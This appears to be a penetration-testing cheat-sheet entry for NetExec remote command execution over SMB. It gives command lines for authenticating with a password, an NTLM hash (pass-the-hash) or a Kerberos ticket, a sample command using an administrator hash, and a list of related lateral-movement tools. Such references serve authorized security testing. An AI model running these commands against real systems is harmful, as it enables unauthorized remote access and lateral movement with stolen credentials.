NetExec SMB Command Exec
Execute commands on a remote Windows host via SMB using NetExec
- Tool
- nxc
- Category
- Lateral Movement / Remote Shells
- Platform
- linux
- Requires
- password
- Protocols
- SMB
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
nxc smb '<ip>' -u '<user>' -p '<password>' -d '<domain>' -X 'whoami'
Credential variants
The same attack using a different authentication material.
NTLM Hash requires NTLM hash
nxc smb '<ip>' -u '<user>' -H '<hash>' -d '<domain>' -X 'whoami'
Kerberos Ticket requires Kerberos ticket
nxc smb '<ip>' --use-kcache -d '<domain>' -X 'whoami'
Examples
nxc smb '192.168.1.100' -u 'administrator' -H 'f29207796c9e6829aa1882b7cccfa36d' -d 'bastion.local' -X 'whoami'
Tags
Related commands
- Evil-WinRM Shell Windows Remote Management shell connection
- Impacket AtExec Execute commands via Windows Task Scheduler service
- Impacket atexec.py (Scheduled Task) One-shot command execution by creating, running, and deleting a scheduled task over…
- Impacket DCOMExec Execute commands via DCOM (Distributed Component Object Model)
- Impacket dcomexec.py Execute commands over DCOM (MMC20.Application / ShellWindows / ShellBrowserWindow)…
- Impacket PSExec Execute commands via PSExec service
- Impacket SMBExec Execute commands via SMB service creation
- Impacket WMIExec Execute commands via WMI (Windows Management Instrumentation)